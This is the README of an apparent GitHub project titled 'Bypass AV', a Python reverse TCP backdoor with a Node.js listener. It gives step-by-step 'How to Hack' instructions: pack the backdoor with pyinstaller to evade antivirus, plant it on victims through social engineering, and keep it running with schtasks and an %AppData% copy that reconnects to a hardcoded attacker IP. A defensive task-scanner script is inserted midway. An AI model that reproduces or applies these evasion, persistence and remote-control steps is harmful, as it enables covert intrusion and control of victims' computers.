[Bypass AV] Python Reverse TCP: simple reverse tcp backdoor
Python Reverse TCP Shell
- ywang189 – Yiyi Wang
- cjsmith7 – Christian Smith
Multiple files are provided
- reverse_tcp.py
  - malicious Python code; run it on the victim side.
  - can be packed into an “exe” file using pyinstaller and run on Windows without being detected by antivirus software (tested on Windows 8.1, not detected)
  - On Windows, run pyinstaller --noconsole --onefile reverse_tcp.py to pack the malicious reverse_tcp.py into a Windows executable file.
- listener.js
  - simple listener written in JavaScript (Node.js)
  - Commands
    help
    exit - quit listener
    list - list victims
    connect num - connect to one victim
    e.g. ‘connect 0’ will connect to the first victim in the victim list
    schedule n_minutes - schedule attack (for Windows only), force the victim to try to connect to the attacker every n_minutes
- schtasks_template.xml (for Windows hack only)
  - sample template for the schtasks program on Windows
  - e.g. when scheduling a malicious task from schtasks_template.xml on Windows, run the following command
    schtasks /CREATE /XML path_to_schtasks_template.xml /TN malicious_task_name
- dist/reverse_tcp.exe
  - exe file packed using pyinstaller as mentioned above.
  - don’t run this file on your machine, it is dangerous (as it will connect to my attack machine at IP 45.55.139.173).
- cleanup.bat (for Windows)
  - removes our simple stupid trojan from the victim’s system
  - double-click it to clean up.
How to Hack (For Windows)
- Set the variable attacker_ip in reverse_tcp.py to the attacker’s IP address
- Run pyinstaller --noconsole --onefile reverse_tcp.py to create reverse_tcp.exe
- Copy reverse_tcp.exe to the victim’s machine and execute it. (No console will pop up, so don’t worry)
- Run node listener.js on the attacker’s machine to start listening for responses from victims.
How to Hack (For *nix)
- Set the variable attacker_ip in reverse_tcp.py to the attacker’s IP address
- Copy reverse_tcp.py to the victim’s machine and run python reverse_tcp.py.
- Run node listener.js to start listening for responses from victims.
General descriptions
- On the attacker side, execute node listener.js to run the listener on the attacker’s machine.
- Plant and execute reverse_tcp.py on the victim machine. (social engineering, camouflaging the .py file as part of a package, etc.)
How it works (For Windows)
- The reverse_tcp.py (reverse_tcp.exe) file first copies itself to the %Appdata% folder, then creates a schtasks_template.xml file for scheduling tasks.
- It then runs the schtasks program and sets up the scheduled task so that the victim tries to connect to the attacker every 30 minutes by default.
- After that, the victim tries to connect to the attacker’s IP and port.
- The attacker sends commands to the victim, and the victim executes those commands on its machine.
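A defender-side check for the persistence described above, as an added example that is not part of the original project: it reads a Task Scheduler XML task definition and flags a task that launches a program from AppData on a short repeating interval. The sample XML, the 60-minute threshold and the function names are assumptions made for this illustration.

```python
import re
import xml.etree.ElementTree as ET

# XML namespace of Task Scheduler task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
APPDATA = re.compile(r"%appdata%|\\appdata\\(roaming|local)\\", re.IGNORECASE)
INTERVAL = re.compile(r"^PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$")

def interval_minutes(text):
    """Convert a Repetition Interval such as 'PT30M' to minutes; None if unparsable."""
    m = INTERVAL.match((text or "").strip())
    if not m or not any(m.groups()):
        return None
    hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return hours * 60 + minutes + seconds / 60

def review_task(xml_text, max_minutes=60):
    """Return findings for a task that repeatedly launches a program from AppData."""
    root = ET.fromstring(xml_text)
    commands = [c.text.strip() for c in root.findall(".//t:Exec/t:Command", NS) if c.text]
    intervals = [interval_minutes(i.text) for i in root.findall(".//t:Repetition/t:Interval", NS)]
    findings = [f"action runs from user-writable AppData path: {c}"
                for c in commands if APPDATA.search(c)]
    short = [i for i in intervals if i is not None and i <= max_minutes]
    if findings and short:
        findings.append(f"trigger repeats every {min(short):g} minutes")
    return findings

# Constructed sample task definitions (not taken from the project's template).
SUSPICIOUS = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT30M</Interval></Repetition>
    <StartBoundary>2020-01-01T00:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Actions><Exec><Command>C:\Users\alice\AppData\Roaming\updater.exe</Command></Exec></Actions>
</Task>"""
BENIGN = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger>
    <StartBoundary>2020-01-01T03:00:00</StartBoundary>
  </CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\Windows\System32\defrag.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, review_task(xml_text))
```

Task definitions exported from a live system can be passed to review_task as raw file bytes, which lets the XML parser pick up the file's declared encoding.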
Why implement the Reverse TCP attack in Python
We first tried Metasploit and used the windows/shell_reverse_tcp payload to generate the malicious exe file, and we also tried msfencode to encode the exe file. However, no matter how we encoded the malicious exe file, Windows Defender could always detect it. (It is interesting to find out that some third-party AV couldn’t detect our trojan.) After doing some research, we found out that Windows Defender will always load the program into memory first and then scan it, so encoding will never work.
Source: https://github.com/shd101wyy/